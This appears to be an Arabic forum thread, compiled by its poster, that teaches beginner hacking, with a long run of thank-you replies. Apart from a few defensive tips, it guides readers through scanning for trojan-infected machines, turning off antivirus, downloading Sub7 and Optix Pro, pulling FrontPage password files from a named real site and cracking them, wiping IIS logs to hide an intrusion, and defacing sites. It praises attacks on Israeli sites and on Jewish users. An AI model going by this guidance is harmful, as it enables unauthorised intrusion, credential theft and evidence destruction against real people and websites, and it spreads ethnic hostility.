مع ملاحظه انه فى حاله انزالك لبرنامج او استخدام اى برامج تشات ..سوف تجد رقم الاى بى اما الخاص بالموقع الذى تقم بانزال البرنامج منه .. او رقم الاى بى الخاص بالشخص الذى تتحدث اليه .. وكما سبق ان قلنا فهذه احدى الطرق التى تستخدم لمعرفه رقم الاى . بى ... لاى جهاز يستخدم برامج التشات


ملاحظ مهمة جدا

لا يستطيع الهاكر الدخول إلى جهازك إلا مع وجود ملف يسمى ( patch ) أو (trojan ) في جهازك وهذه الملفات هي التي يستطيع الهاكر بواسطتها الدخول إلى جهازك الشخصي حيث يستخدم الهاكر أحد برامج التجسس التي ترتبط مع ملف الباتش الذي يعمل ك (ريسيفر) يستطيع أن يضع له الهاكر ( إسم مستخدم ) و ( رمز سري ) تخوله أن يكون هو الشخص الوحيد الذي يستطيع الدخول إلى جهازك وكذلك يستطيع أن يجعل جهازك مفتوحاً فيستطيع أي هاكر أن يدخل إلى جهازك !!

كيف يختار الهاكر الجهاز الذي يود اختراقه ؟
بشكل عام لا يستطيع الهاكر العادي من اختيار كمبيوتر بعينه لاختراقه إلا إذا كان يعرف رقم الآي بي أدرس الخاص به كما ذكرنا سابقاً فإنه يقوم بإدخال رقم الآي بي أدرس الخاص بكمبيوتر الضحية في برنامج التجسس ومن ثم إصدار أمر الدخول إلى الجهاز المطلوب !!

وأغلب المخترقين يقومون باستخدام برنامج مثل ( IP Scan ) أو كاشف رقم الآي بي وهو برنامج يقوم الهاكر باستخدامه للحصول على أرقام الآي بي التي تتعلق بالأجهزة المضروبة التي تحتوي على ملف التجسس ( الباتش ) !

يتم تشغيل البرنامج ثم يقوم المخترق بوضع أرقام آي بي افتراضيه .. أي أنه يقوم بوضع رقمين مختلفين فيطلب من الجهاز البحث بينهما فمثلاً يختار هذين الرقمين :

212.224.123.10

212.224.123.100

لاحظ آخر رقمين وهما : 10 و 100

فيطلب منه البحث عن كمبيوتر يحوي منفذ ( كمبيوتر مضروب ) بين أجهزة الكمبيوتر الموجودة بين رقمي الآي بي أدرس التاليين : 212.224.123.10 و 212.224.123.100
وهي الأجهزة التي طلب منه الهاكر البحث بينها !


بعدها يقوم البرنامج بإعطائه رقم الآي بي الخاص بأي كمبيوتر مضروب يقع ضمن النطاق الذي تم تحديده مثل :

212.224.123.50

212.224.123.98

212.224.123.33

212.224.123.47

فيخبره أن هذه هي أرقام الآي بي الخاصة بالأجهزة المضروبة التي تحوي منافذ أو ملفات تجسس فيستطيع الهاكر بعدها من أخذ رقم الآي بي ووضعه في برنامج التجسس ومن ثم الدخول إلى الأجهزة المضروبة !

ما هي أشهر برامج الهاكرز ؟

netbus

من أقدم البرامج في ساحة الاختراق بالسيرفرات وهو الأكثر شيوعا بين مستخدمي المايكروسوفت شات وهو برنامج به العديد من الإمكانيات التي تمكن الهاكر من التحكم بجهاز الضحية وتوجد نسخ مختلفة أكثر حداثة من النت باس وكل نسخى منها أكثر تطوراً من الأخرى ..

SUB 7

برنامج ممتاز وغني عن التعريف .. تستطيع التحكم وتنسيق السيرفر ليعمل كيفما تشاء سواء من تغيير شكل او طريقة عمل وهو ممتاز في مجال الاختراق بالبرامج ..

****************************************** Utility

برنامج مفيد ورهيب للهاكرز وخاصة المبتدئين والمحترفين حيث أنه يمتلك أغلب وأفضل إمكانيات مختلف برامج الهاكرز ويمكن من خلاله كسر الكلمات السرية للملفات المضغوطة وفك تشفير الملفات السرية المشفرة وكذلك تحويل عناوين المواقع الى أرقام آي بي والعكس كما به العديد العديد من الإمكانيات والمميزات التي يبحث عنها الكثير من الهاكرز ..

Back Orifice

برنامج غني عن التعريف لما لفيروسه من انتشار بين أجهزة مستخدمي الانترنت ولكن حتى تستطيع اختراق أحد الأجهزة لابد أن يكون جهازك ملوثاً بنفس الفيروس المستخدم ..


كيف تعرف إذا كان جهازك مخترقاً أم لا ؟

في البداية تستطيع أن تعرف إذا كان جهازك مخترقاً من خلال معرفة التغيرات التي يحدثها الهاكرز في نظام التشغيل مثل فتح وغلق الشاشة تلقائياً أو وجود ملفات جديدة لم يدخلها أحد أو مسح ملفات كانت موجودة أو فتح مواقع إنترنت أو إعطاء أمر للطابعة بالإضافة إلى العديد من التغيرات التي تشاهدها وتعرفها وتعلم من خلالها عن وجود متطفل يستخدم جهازك ..

هذه الطريقة تستطيع من خلالها أن تعرف هل دخل أحد المتطفلين إلى جهازك أم أن جهازك سليم منهم ..


افتح قائمة (Start) و منها اختر أمر (Run).

اكتب التالي : system.ini

ستظهر لك صفحة فاذهب للسطر الخامس فيها فإذا وجدت أن السطر مكتوب هكذا :

user. exe=user. exe

فاعلم أن جهازك لم يتم اختراقه من قبل الهاكرز.

أما إذا وجدت السطر الخامس مكتوب هكذا

user. exe=user. exe *** *** ***

فاعلم أن جهازك قد تم اختراقه من أحد الهاكرز.


ما هي أهم الاحتياطات التي يجب اتخاذها للحماية من الهاكرز ؟

1- استخدم أحدث برامج الحماية من الهاكرز والفيروسات وقم بعمل مسح دوري وشامل على جهازك في فترات متقاربة خصوصاً إذا كنت ممكن يستخدمون الإنترنت بشكل يومي ..

2- لا تدخل إلى المواقع المشبوهة مثل المواقع التي تعلم التجسس والمواقع التي تحارب الحكومات أو المواقع التي تحوي أفلاماً وصوراً خليعة لأن الهاكرز يستخدمون أمثال هذه المواقع في إدخال ملفات التجسس إلى الضحايا حيث يتم تنصيب ملف التجسس ( الباتش ) تلقائياً في الجهاز بمجرد دخول الشخص إلى الموقع !!

3- عدم فتح أي رسالة إلكترونية من مصدر مجهول لأن الهاكرز يستخدمون رسائل البريد الإلكتروني لإرسال ملفات التجسس إلى الضحايا .

4- عدم استقبال أية ملفات أثناء ( الشات ) من أشخاص غير موثوق بهم وخاصة إذا كانت هذه الملفات تحمل امتداد (exe) مثل (love.exe) أو أن تكون ملفات من ذوي الامتدادين مثل (ahmed.pif.jpg) وتكون أمثال هذه الملفات عبارة عن برامج تزرع ملفات التجسس في جهازك فيستطيع الهاكرز بواسطتها من الدخول على جهازك وتسبيب الأذى والمشاكل لك ..

اول شي لازم تعرفوا ان الهكر مهمته مش في اختراق الاجهزه وبس , الهاك هو اي محاوله للتطفل او معرفة الاسرار في اي شيء .

الهكرز هم الناس الي يكونون عباقرة في مجال الكمبيوتر ويعرفون اسراره ,

طبعا اول شي لازم نفرق بين كلمة هكر وكلمة كراكر .

الهكر شغلته بس التطفل ومعرفة الاسرار بدون الحاق الضرر , يعني مثلا انا اذا اخترقت جهاز شخص , باخذ لي لفةسريعة فيه , بشوف محتوياته . ويمكن انبهه عن الثغره الي في جهازه واساعده .

اما الكراكر هو لقب اول ما طلع , طلع على الاشخاص الي يقومون بكسر حماية البرامج .

وهم ايضا الاشخاص الي يخترقون ويسببون الضرر , مثلا انا اذا اخترقت جهاز يهودي , بسرق باسورداته كلها وبغيرها , وبلحق الضرر في جهازه , يعني بقيت كراكر .


اول معلومه اساسيه لازم تعرفوها , ان برامج الهكر اغلبها بتكشفها برامج الحمايه , يعني لو

عايز تشغل برامج الهكر لازم تقفل برامج الانتي فايرس

برامج الاختراق الي تعتمد على التروجان الي له عدة معاني منها الباتش او السيرفر او الخادم

كلها تحتوي على 3 ملفات اساسيه .

client الي هو المتحكم , يحتوي على اوامر التحكم بجهز الضحيه .

server الي هو يسمى الخادم , وظيفته فتح مدخل في جهز الضحيه الي نحن نسميه بورت ,

ويقوم بالاتصال مع الكلاينت .

edit server هذا الملف تقدر عن طريقه تعدل في اوامر وخواص السيرفر , يعني مثلا تخلي

السيرفر يفتح بورت معين انته تحدده , مثلا تضيف له خاصية التبليغ بدخول الضحيه . وغيرها ,

طبعا يعتمد , كل برنامج خياراته تختلف .

في بعض برامج الاختراق الجديده تحتوي بدل السيرفر وال edit server على ملف اسمه

builder , وظيفته نفس وظيفة ال edit server لكن الشي المميز فيه هو انه بعد الانتهاء من

الاعداد تضغط على create server ويقوم في نفس الوقت بانشاء ملف السيرفر .

المرة القادمةح نتكلم عن الامتدادات , وبعض الاساسيات .

وانشالله بعد الدروس البسيطه دي ح نبدا بالتطبيقات العمليه ارجو ان تكون وصلت الفكرة

الاساسية اليكم وشكر

نتكلم عن الامتدادت

اول شي لازم تعرفوا بعض الامتدادات الاساسيه , زي الصور تكون امتدادتها jpg , jpeg , gif

bmp . الفلاش يكون فالغالب wsf , الملتي ميديا تكون avi , mpg , mpeg . ملفات القرائه pdf ,

html , txt , doc .

دلوقتي نروح على الشغل المهم , امتداد برامج الهكر والتروجانز :

برامج الهكر امتداداتها مقتصره على الامتدادات التنفيذيه , يعني الامتدادات الي بنضع فيها

اوامر بتشتغل لامدادات التنفيذيه هي : dll , cox , com , exe , bat , pif وهناك غيرها كتير

افضل امتداد للبرامج هو exe , تلاقيها في اغلب البرامج مش شرط برامج الهكر

cox و bat اغلب الفيروسات يكون هذا امتدادها .

pif هذا امتداد موجة الدوس , لاحظوا مدى التقارب بين ال pdf و gif و pif . كتير قوي ينخدعوا

بهذا الامتداد اما dll , cox اغلب برامج السيستم

المهم اللي عايزين نعرفه من الكلام ده كله , ان التروجانات ميطلعش امتدادها عن الامتدادات

التنفيذيه ابد يعني محدش يقول بحول الامتداد الى امتداد صوره وبرسله للضحيه , بيتغير الامتداد

صح لكن الباتش مش ح يتشتغل .

واذا ارسل لك شخص صوره وامتدادها من الامتدادات التنفيذيه , لا تقبل منه اي شي

يا جماعة مهم مهم جدا الدرس ده وركزوا فيه قوي ده بقي كوم واللي ح اكتبه دلوقتي كوم تاني

تخيلوا ان جهاز الكمبيوتر عباره عن بيت , وكل بيت لازم يكون له عنوان العنوان هذا هو الايبي ip

البيت ده له مداخل كتير , الي نسميها بورتات ports . مثلا السياره ليها مدخل السائق

و ابواب اخري والي هي نفسها فالكمبيوتر عندنا مثلا لو فتحنا المتصفح فانه سوف يقوم

بالاتصال مع الانترنت عبر المدخل رقم 80 وهو ثابت ومعروف , ومثلا لو فتحنا المسنجر بيتصل

عبر البورت 110 , كل ما نفتح برنامج اتصال سوف تجدون ان منفذ فتح في جهازك , لكن طبعا

لايمكن اختراق المنافذ دي تخيلوا الموضوع زي ابواب البيت لكن عليها حراسه .

في بعض البيوت فيها ابواب خلفيه , وهي الي نسميها الباكدورز back doors , التروجانز

تسمى بالبك دورز ايضا . يعني نتخيلها انا هو الكلاينت client وعايز ادخل بيت اقوم بارسال

شخص اخر الى البيت يقوم بفتح باب خلفي لي وادخل انا , اذا هذا الشخص راح من البيت لن

يفتح الباب لي احد

نفس الشي مع الكمبيوتر , بعد ارسال التروجان للجهاز يقوم بفتح منفذ لي احدده انا في اعداد

السيرفر ويقوم السيرفر هذا بفتح المنفذ لي , وادخل منه . اذا انحذف السيرفر من الجهاز لن

استطيع الدخول .

طبعاما اقدر ادخل بيت بدون ما اعرف عنوانه ومكانه , عن طريق الايبي الي هو عنوان الجهاز

اقدر اني اتصل بالجهاز , لكن ما اقدر ادخل عليه الى عن طريق الخدام الي يفتح لي الباب .


ايه رايكم نطبق على الخفيف . لان التطبيق يكفي عن الف كلمه ودرس .

بسم الله نبدا .

اول شي بنبدا بالاختراق العشوائي , يعني نعمل سكان (بحث) على اي جهاز مصاب من قبل

وندخل عليه .

بنحتاج لبرنامج super scan

لكن للتبسيط سوف نستخدم الاسكان الي في برنامج sub 7 واليكم وصلت البرامج اللي

وصلة السب سفن الاصدار الاخير : http://www.geocities.com/kousotsu83/Zip/sub7legends.zip

نحتاج بعد لبرنامج optix pro

وصلة تحميله : http://www.evileyesoftware.com/cgi-bin/cou...gi?OptixPro.zip





يا خي العزيز ولايهمك انت تطلب والله المستعان بص يا سيدي تعمل ايه

الشرح بالصور معاك وح اتكلم عن التفاصيل

بالنسبة لرقم 1

مكتوب امامه كلام غريب ده بعتاعي ملكش دعوة بيه المهم

2- 195.218.139.150 كده الاي بي بص عليه : وجانبيهم رقم 80 وهو ده البورت

ده اي بي خاص بموقع والمنفذ رقم 80 عنده يعني مفيش بورت برنامح هكر --------

3- ده برده موقع انا متصل بيه والاي بي بتاعه هو 216.239.39.147 والمنفذ بتاع الموقع ده 80

يبقي مفيش اي بورت غريب من بورتات برامج الهكرز

4-مكتوب ايه......

downloads4.kaspersky-labs.com ده موقع انا بحمل منه برنامج والبورت بتاعه 80

ومكتوب كده امامه downloads4.kaspersky-labs.com : 80

إذن انا شغل مظبوط ومفيش مشكلة ok

سوف اعرض اليوم طرق اختراق المواقع عن طريق بعض الثغرات وشرح احدي البرامج

لفك تشفير الباسوردواشياء كثيرة من بعد عناء من جمع هذه المعلومات ارجو ان

تستفيدوا منها

الموضع مجمع من مواقع عديدة
ووضعته بامنتدي علشان كله يستفيد
لازم تعرف ان مفيش حاجة ابدا بالساهل لازم تتعب .
يعني مش ح تدوق طعم النجاح من غير ماتفشل وتفشل كتير كمان
الهكر الحقيقي ميستعملش برامج صنعها هكر غيره لا هو اللي يبتكرحاجات جديدة.
ونحاول نعمل كده مش صعب ابدا


1- اساسيات وتعريف:
التلنت telnet
و هو برنامج صغير موجود في الويندوز . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر
أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة خفية
لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات.
لاستخدام البرنامج ، اذهب الى
Start ==> Run ==> telnet
و ستظهر شاشة التلنت.

برامج السكان :
Scanner
و هي برامج موجودة للمسح على المواقع و كشف ثغراتها إن وجدت ، فهي سريعة،
كما أنها تملك قاعدة بيانات واسعة و كبيرة تحتوي على الثغرات أو الاكسبلويت
التي يتم تطبيقها على الموقع لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم لا . و من أمثلة هذه البرامج
Shadow Security Scanner و Stealth و Omran Fast
و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر
معين مثل البرامج المختصة بالسكان على سيرفرات الـ
IIS
على ثغرات السي جي اي فقط و منها برامج المسح
CGI

اكسبلويت:
Exploits
هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان
URL
تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى
السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين
في السيرفر لعمل كراش له ، و هذا ما يسمى بـ
Buffer Over Flow Exploits
هناك أنواع من الإكسبلويت ، فمنها ال
CGI Exploits
CGI Bugs
Unicodes Exploits
Buffer Over Flow Exploits
PHP Exploits
DOS Exploits
والتي تقوم بعملية حجب الخدمة للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر أي فايرول
Fire Wall
.وهناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون


امتدادها (.c)
هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها
الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل
الإكسبلويت المكتوب بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى
نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل
ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه
Borland C++ Compiler
و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا

الجدار الناري:
Fire wall
هي برامج تستعملها السيرفرات لحمايتها من الدخول الغير شرعي لنظام ملفاتها من قبل المتطفلين هي تمثل الحماية للسيرفر طبعا ولكني أنوه بأن الفايروات المستخدمة لحماية السيرفرات (المواقع) تختلف عن تلك التي تستخدم لحماية الأجهزة.

ملف الباسورد المضلل :
Token
(Shadowed Passwd)
والذي يكون فيه الباسورد على شكل
*
او
x
البحث عن ملف الباسورد الغير المظلل و الذي يسمى إن وجدت ملف الباسورد مظللا ، فيجب
Shadow file
تجده في
/etc/shadow

التخفي :
Anonymouse
هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد
اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها
في الدخول المجهول الى السيرفر و سحب الملفات منه.

Valnerableties

أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب
و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى
استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .
ما هي معناها ؟
Valnerable
أي ثغرة أو بالأصح موضع الضعف والمكان الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع
Security Focus
أو بوق تراك او غيرها.

: ملف الباسوورد
passwd file
هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص
المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.

الجذر:
root
و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات
في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.
غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن
نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها .

السيرفر:
server
هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه
فهو جهاز كمبيوتر عادي كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص
الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون
المواقع شغالة 24 على الإنترنت . قد يملك و يستضيف السيرفر أكثر من موقع
واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي اختراق
السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي
تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو
سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع
الإسرائيلية و بكثرة و لله الحمد .( جزاكم الله خيرا أيها المجاهدون)

بوفر أوفر فلو:
Buffer over Flow
وهي نوع من أنواع الاكسبلويتات التي تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الإف تي بي أو غيره لأجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و لالغاء الرقعة الموجودة بها كي يتم استغلالها مجددا - بعد عمل الكراش لها طبعا - يتم استغلالها في معاودة الإتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها . و هي شبيهة نوعا ما بعملية حجب الخدمة اذ أنها تقوم بعملية اوفر لود على جزء مركز من السيرف

كثير من الهكرز يحبون ان يطلقوا على كل من ال
pc , servers , supercomputers
كلمه
BOX

النظام الذي سوف تقوم باختراقه يحتوي عاده على العديد من اليوزرز ..بالاضافه لليوزرز
تسطيع ان تطلق على الرئيس هناك كلمه
superuser
وهو يكون روت
وهو الادمين او المدير على النظام....

ماهو الشيل اكاونت:
هو عباره عن خدمه حيث يمكنك من خلالها التحكم في جهاز من بعيد و هذا الجهاز عليه نظام اليونيكس

دلوقتي اخترقت موقع لازم تمسح خطواتك علشان لايعرفك صاحب الموقع ويئذيك ازاي ؟
/c+del+c:/winnt/system32/logfiles/*.log
تنكتب هذا الامر بالدوس
او نروح السي وبعدين فايل ويندوز بعدين فايل
system32
بعدين
امسح ملف اسمة

*.log


دلوقتي انت اخترقت موقع وعايز تغير صفحة البداية ونكتب تم اختراق هذا الموقع ازاي؟
تقدر تغير الصفحه الرئيسه لما يكون الباسورد بتاع الموقع عندك بعدين تدخل عليه بعدين تروح لملف اسموا
index
افتحوا او الغيه و حط ملف بنفس الاسم بالأشياء اللي انت عايزها ببرنامج اسمه
WS_FTP PRO

ودلوقتي شوية برامج

برامج للبحث عن ثغرات وأنظمة المواقع وبعض معلوماتها
هذه من أفضل برامج البحث عن الثغرات وانشاء الله تعجبكم انت بس ادخل وح تشوف كل حاجة


1- N-Stealth

http://www.computec.ch/software/web...lth-3.2-b50.zip
أداة رائعة وقوية وتتميز باكتشاف نظام الموقع وثغراته


2- Shadow Security Scanner

http://www.safety-lab.com/rus/download/download.htm

http://www.bluechillies.com/download.html?sid=7565
برنامج ذو شهرة عالية وفعالية كبيرة في فحص المواقع من المنافذ والثغرات


3- Omran Scanner

http://www.geocities.com/eljehad/oscan.zip

برنامج عربي من برمجة عمران الغامدي ولابأس به لاكتشاف الثغرات ويحتوي على ملفات للبحث زي
Linux-Unix-NT

4- CGI Scanner

http://www.astalavistalab.com/files/cgis4.zip
مختص في البحث عن ثغرات
cgi
وهو الأفضل في عمل ذلك


5- UniScan

http://online.securityfocus.com/data/tools/uniscan.zip
زي اللي فات ولكن هذا البرنامج خاص بفحص ثغرات UNicode


6- Retina Apache Chunked

http://www.arabsmag.com/hackprog/sc...acheChunked.zip
للبحث عن الأجهزة والمواقع التي تملك ثغرة
Apache


7- SamiScaN

http://www.angels-bytes.com/?show=t...tion=info&id=20
أداة رائعة وعربية يعرض نظام التشغيل والملقم والعنوان الحقيقي ويحتوي على أربع ملفات لايجادالثغرات
cfusion.txt, cgi.txt, cgi2.txt, NT.txt


8- voideye

http://content.443.ch/pub/security/...ner/VoidEye.zip
نسمع عنه كتير وهو لأنه أقدم برنامج في البحث عن الثغرات يملك واجهة جميلة ولكني لاأفضله على
sss
Shadow Security Scanner



الملقمات اشهرها اثنين
IIS:
من مايكروسوفت وهذه مليانة ثغرات ومواقع قليل مقفلة ثغراتها
apache:
من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب.



اول خطوة في الاختراق هي اخذ المعلومات:
يعني نعرف الموقع ان الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها.
طيب دلوقتي عندنا موقع وعايزين نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها عندك الموقع

http://www.netcraft.net/
ملاحظة: نكتب الموقع من غير

http://
ولا
/
اللي بالاخير
او نستخدم التلنت.
1 - مثال على ملقمات اي اي اس:
راح يطلع لنا التالي
The site http://www.***.com/ / is running Microsoft-IIS/5.0 on Windows 2000
طيب دلوقتي عرفنا معلومتين مهمتين
اول شيء انه شغال على الملقم
IIS5.0
ثاني شيء شغال على نظام ويندوز 2000
اول شيء نجرب ثغرات
IIS5.0
عليه
إذا مانفعش نشوف ثغرات نظام ويندوز 2000
طيب دلوقتي فيه حاجة اسمها يوني كود هذه تخترق فيها عن طريق المتصفح وماتمشيش إلا مع ملقمات
IIS
وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع.
طيب لنفرض انه ماطلعش فيها ثغرات؟
نشوف محتويات الموقع نفسه
نشوف إن كان عنده سجل زوار او منتدى او ....
مثال على ملقمات اباتشي:
ناخذ مثال موقع ارانك

http://www.*****.com/

لو حللناه بالنيت كرافت راح نشوف النتيجة التالية:

The site http://www.*****.com/ is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux
هنا يهمنا ثلاث اشياء:-
1- الملقم وهو:
apache 1.3.20
2- ودعم فرونت بيج وهذه مليانة ثغرات
FrontPage/5.0.2.2510
3- النظام وهو
Linux

الملقم:

اول شيء اباتشي من الملقمات الصعبة الإختراق إلا بعض الإصدارات منها فنحط ده على جنب.

دعم الفرونت بيج زي ماقلنا الفرونت بيج مليان ثغرات وثغراته قوية وكثيرة تقريبا منها مجلد
_vti_pvt
و
_private
هذه اللي نحتاجها غيره مامنه فايدة داخل المجلدين راح نلاقي اربع ملفات مهمة وهي
service.pwd
و
users.pwd
و
authors.pwd
و
adminstators.pwd
ويعتبر هذا اخطر ملف طيب لو قدرنا ننزل واحد من الملفات هذه (ملاحظة الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها بالنوت باد ونلاقي السطر هذا على سبيل المثال
goodyco:CalXS8USl4TGM
وهذا من موقع قودي

http://www.goody.com.sa/_vti_pvt/service.pwd
طيب دلوقتي
goodyco
اليوزر والباسورد مشفر واللي هو
CalXS8USl4TGM
وازاي ينفك؟
ينفك ببرنامج اسمه
john the repaier

طيب نروح للفقرة الثالثة واللي هي النظام زي ماشفنا النظام هو لينكس لكن لينكس ايه؟ فيه
ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر لكن هنا راح تواجهك مشكلتين
اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ال
telnet
واكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته المشكلة الثانية لازم يكون عندك لينكس اصلا علشان ثغراته بلغة ال
c
وهذه ماتشتغلش إلا عاللينكس فقط.

مواقع تطلعلك ثغرات الانظمة والويندوز والمنتديات

http://www.ussrback.com/
الموقع هذا خطير جداً جداً تروح ل
EXPLOITS
اللي عالشمال وتختار اول اختيار هنا ثغرات جميع الانظمة من لينكس و ويندوز و و و الخ.. ومنوعة من
c
و
perl
و يوني كود.

http://neworder.box.sk/

هذا الموقع مفيد جدا تكتب مثلا فوق بالمربع اللي عاليمين
IIS او apache
او منتدى واصدارته او اي برنامج ويطلع لك ثغراته.

أرشيف لثغرات

www.securiteam.com/exploits/archive.html

أرشيف لثغرات

www.ussrback.com

أرشيف لثغرات

www.secureroot.com

أرشيف لثغرات

www.root************************l.comأرشيف لثغرات


مواقع لثغرات

www.secureroot.com/category/exploits

20- هناك انظمة وملقمات كثيرة منها:
Apache (الملقم)
IIS(الملقم)
SunOS(الملقم)
FreeBSD (My BaBe)(الملقم)
OpenBSD(الملقم)
NetBSD(الملقم)
AIX(الملقم)
IRIX(الملقم)
NetScape(الملقم)
Enterprise(الملقم)
Windows/NT/2000/xp (نظام التشغيل)
Linux(نظام الشتغيل )

له ست مجلدات اليونكس

bin خاص بالملفات الثنائيه يعني اللي تشغل النظام
etc ملفات ادارة النظام ومن ضمنها الرووت اللي هو حساب مدير النظام او passwd
dev ملفات الاجهزه
lib مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل
tmp الملفات الموقته او غير الثابته
usr اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام


اوامر الاف تي بي
Pwd
لكي تعرف ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب علي جهازك
مثال
Get black.exe
Put
العملية العكسية ل
Get
يعني ان تأخد ملف من سطح المكتب علي جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية
يمكنك تشغيل الاف تي بي من الويندوز عن طريق :
START > RUN > ftp -n hostname

بورتات برامج :
7 echo
21 telnet
23 ftp
25 smtp
80 http
110 POP

تمااااااااااااااااااااااام يا برنس

شكرا جدا على المجهود بتاعك

وعلى فكرة انا كنت قلت عليك انك عبقرى قبل كدة

وكنت بعتلك رسالة ومستنية الر

موضوع رائع اخى الكريم جزاك الله خير وكل عام وانت بخير

موضوع ممتاز فعلا و به معلومات قيمة جدا

الى الامام..........

موضوع يستحق الاشادة بيه
بس في وصلات مش شغالة زي وصلة sub 7 legends الاخيرة

شكرا على المعلومات دى كلها

موضوع جميل و يستحق التثبيت و اسف على التأخير في الرد

ما شاء الله موضوع يستحق التثبية و مميز و فيه معلومات هامه و عديده
و الله يبارك فيك اخوي shiko ahmed
و مشكور على الموضوع المميز

معلومات مهمة جدا جدا وموضوع حقيقى قوى

موضوع رائع و مفيد جدا يستاهل التثبيت فعلا
شكرا على الموضوع

ألف شكر يا برنس .
موضوع فعلا رائع.....

ألف ألف شكر يا باشا علي موضوعك الجميل
وشكرا علي المعلومات اللي في الموضوع
ومليون شكر علي مجهودك الرائع

موضوع اكثر من رائع

شاكر جدا ياأخى العزيز

متشكرين يا باشا الف شكر الموضوع شيق جدا

الف شكر على ردكم الاكثر من رائع يا شباب

واللى عايز حاجة تانى يقولى

الف شكر علي كل اللي قدمته ياباشا

شكرا على الموضوع

الف الف الف شكر

مشكور................
يعطيك العافيه .................

شكرا جزيلا يا مان على المعلومات القيمه

ممكن برنامج سرقة الايميلات اناااااااااااااااااا عاوزززززززز ممكن ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

thanxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

بجد بارك الله فيك
موضوع روعة تسلم ايدك فى حاجات الواحد اول مره بيسمع عنها

بس انت كده خوفت الواحد انه يدخل ع النت اصلا

الف شكر علي كل اللي قدمته ياباشا

thnxxxxxxxxxxx

شكرااا يا جماعه علي هذا الموضوع
حد يقولي علي احسن كتاب لتعلم البرمجه للمبتدئين
يا ريت مشكورين

شكرا علىهذه المعلومات المفيده
واتمنى من الله ان يزيدك من فضله
اخول فى الله
( حسين )

shokran ya basha

الف الف اف شكر يا مان الف الف اف شكر يا مان الف الف اف شكر يا مان الف الف اف شكر يا مان الف الف اف شكر يا مان الف الف اف شكر يا مان الف الف اف شكر يا مان الف الف اف شكر يا مان

شكرا ليك يا جميل

تسلم اخي الكريم على هذه المعلومات

مشكووووووووووووووووووووووووووووووووووووووووووووووو ووووووووور

على الموضوع الجامد

الى الامام

ثانكس ياباشه

شكرااااااااااااااااا الف شكرااااااااااااااااااااااااااااااا

شكرا يا اخى على المعلومات القيمة و المفيدة

مشكور حبيبى

شكرا يا اخى على المعلومات القيمة و المفيدة

